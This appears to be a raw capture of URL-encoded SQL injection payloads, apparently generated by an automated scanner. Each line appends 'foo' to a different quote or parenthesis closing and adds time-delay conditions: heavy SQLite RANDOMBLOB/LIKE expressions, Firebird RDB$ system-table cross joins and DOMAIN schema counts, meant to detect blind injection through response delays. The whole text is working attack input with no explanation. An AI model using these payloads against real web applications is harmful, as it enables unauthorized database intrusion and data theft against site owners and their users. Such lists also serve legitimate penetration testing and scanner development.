foo%27%29%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27BqVk%27%20LIKE%20%27BqVk foo%27%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27Bnng%27%20LIKE%20%27Bnng foo%22%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22eHcv%22%3D%22eHcv foo%22%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22Naod%22%3D%22Naod foo%22%29%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22rvXy%22%3D%22rvXy foo%22%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22HoFI%22%3D%22HoFI foo%22%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%22PZSd%22%20LIKE%20%22PZSd foo%22%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%22KqrS%22%20LIKE%20%22KqrS foo%22%29%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%22WhKH%22%20LIKE%20%22WhKH foo%22%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%22lhKe%22%20LIKE%20%22lhKe foo%29%20WHERE%207466%3D7466%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%27%29%20WHERE%204126%3D4126%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%27%20WHERE%205297%3D5297%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%22%20WHERE%207598%3D7598%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%27%20%7C%7C%20%28SELECT%209446%20FROM%20DUAL%20WHERE%203773%3D3773%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%209033%20WHERE%209758%3D9758%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%209058%20FROM%20DUAL%20WHERE%206747%3D6747%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29 foo%20%2B%20%28SELECT%201060%20WHERE%201213%3D1213%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27lBoR%27%20FROM%20DUAL%20WHERE%207790%3D7790%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27haeI%27%20WHERE%201089%3D1089%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20%23 foo%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%27%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%27%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%22%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%284507%3D4507 foo%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%286842%3D6842 foo%29%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%282191%3D2191 foo%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%27%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%27ZvoG%27%3D%27ZvoG foo%27%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%27OXFK%27%3D%27OXFK foo%27%29%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%27IGDm%27%3D%27IGDm foo%27%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%27pizO%27%3D%27pizO foo%27%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%27VEPL%27%20LIKE%20%27VEPL foo%27%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%27auOg%27%20LIKE%20%27auOg foo%27%29%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%27wCDG%27%20LIKE%20%27wCDG foo%27%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%27qtGl%27%20LIKE%20%27qtGl foo%22%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%22puVo%22%3D%22puVo foo%22%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%22PpKo%22%3D%22PpKo foo%22%29%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%22nomP%22%3D%22nomP foo%22%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%22TMUo%22%3D%22TMUo foo%22%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%22bTOT%22%20LIKE%20%22bTOT foo%22%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%22uhUF%22%20LIKE%20%22uhUF foo%22%29%29%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%28%28%28%22Snca%22%20LIKE%20%22Snca foo%22%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20AND%20%22PkjA%22%20LIKE%20%22PkjA foo%29%20WHERE%207607%3D7607%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%27%29%20WHERE%208069%3D8069%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%27%20WHERE%201619%3D1619%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%22%20WHERE%205755%3D5755%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29-- foo%27%20%7C%7C%20%28SELECT%206117%20FROM%20DUAL%20WHERE%206028%3D6028%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%209021%20WHERE%207464%3D7464%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%202001%20FROM%20DUAL%20WHERE%203158%3D3158%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29 foo%20%2B%20%28SELECT%208383%20WHERE%208424%3D8424%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29 foo%27%20%2B%20%28SELECT%20%27VwHE%27%20FROM%20DUAL%20WHERE%201590%3D1590%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27cqDv%27%20WHERE%206971%3D6971%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%204293%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29--%20%23 foo%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%27%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%27%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%22%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%283208%3D3208 foo%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%282463%3D2463 foo%29%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%288944%3D8944 foo%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%27%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27vLiO%27%3D%27vLiO foo%27%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27lPqp%27%3D%27lPqp foo%27%29%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27rwdS%27%3D%27rwdS foo%27%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27ICfq%27%3D%27ICfq foo%27%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%27BXKV%27%20LIKE%20%27BXKV foo%27%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%27zPId%27%20LIKE%20%27zPId foo%27%29%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%27XGZK%27%20LIKE%20%27XGZK foo%27%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%27xPqx%27%20LIKE%20%27xPqx foo%22%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22kEAo%22%3D%22kEAo foo%22%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22rMuj%22%3D%22rMuj foo%22%29%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22nPoM%22%3D%22nPoM foo%22%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22uyED%22%3D%22uyED foo%22%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%22pRvn%22%20LIKE%20%22pRvn foo%22%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%22IUim%22%20LIKE%20%22IUim foo%22%29%29%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%28%28%28%22toba%22%20LIKE%20%22toba foo%22%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20AND%20%22rmMH%22%20LIKE%20%22rmMH foo%29%20WHERE%201115%3D1115%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%27%29%20WHERE%201899%3D1899%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%27%20WHERE%208877%3D8877%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%22%20WHERE%208904%3D8904%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29 foo%27%20%7C%7C%20%28SELECT%202736%20FROM%20DUAL%20WHERE%201544%3D1544%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%201917%20WHERE%208199%3D8199%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%204749%20FROM%20DUAL%20WHERE%206187%3D6187%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29 foo%20%2B%20%28SELECT%205500%20WHERE%203170%3D3170%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29 foo%27%20%2B%20%28SELECT%20%27XBGL%27%20FROM%20DUAL%20WHERE%208584%3D8584%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27VLVP%27%20WHERE%209323%3D9323%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%204759%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29%20%23 foo%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%27%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%27%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%22%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%288412%3D8412 foo%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%283540%3D3540 foo%29%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%281887%3D1887 foo%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%27%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%27tGJW%27%3D%27tGJW foo%27%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%27JikV%27%3D%27JikV foo%27%29%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%27oDql%27%3D%27oDql foo%27%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%27RRVn%27%3D%27RRVn foo%27%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%27gFgw%27%20LIKE%20%27gFgw foo%27%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%27cEVF%27%20LIKE%20%27cEVF foo%27%29%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%27lOTl%27%20LIKE%20%27lOTl foo%27%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%27MSlf%27%20LIKE%20%27MSlf foo%22%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%22ICzS%22%3D%22ICzS foo%22%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%22XAxI%22%3D%22XAxI foo%22%29%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%22ffyB%22%3D%22ffyB foo%22%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%22IuGl%22%3D%22IuGl foo%22%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%22EwmU%22%20LIKE%20%22EwmU foo%22%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%22UxNa%22%20LIKE%20%22UxNa foo%22%29%29%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%28%28%28%22VKBO%22%20LIKE%20%22VKBO foo%22%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20AND%20%22OkfI%22%20LIKE%20%22OkfI foo%29%20WHERE%201799%3D1799%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%27%29%20WHERE%203790%3D3790%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%27%20WHERE%209068%3D9068%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%22%20WHERE%204096%3D4096%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29-- foo%27%20%7C%7C%20%28SELECT%208871%20FROM%20DUAL%20WHERE%208166%3D8166%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%208569%20WHERE%206548%3D6548%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%208931%20FROM%20DUAL%20WHERE%204795%3D4795%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29 foo%20%2B%20%28SELECT%201556%20WHERE%205262%3D5262%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29 foo%27%20%2B%20%28SELECT%20%27bXPf%27%20FROM%20DUAL%20WHERE%208239%3D8239%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27eCBn%27%20WHERE%202958%3D2958%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%208142%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%29--%20%23 foo%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 foo%27%29%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 foo%27%20AND%207524%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2C%20DOMAIN.COLUMNS%20AS%20T2%2C%20DOMAIN.TABLES%20AS%20T3%29 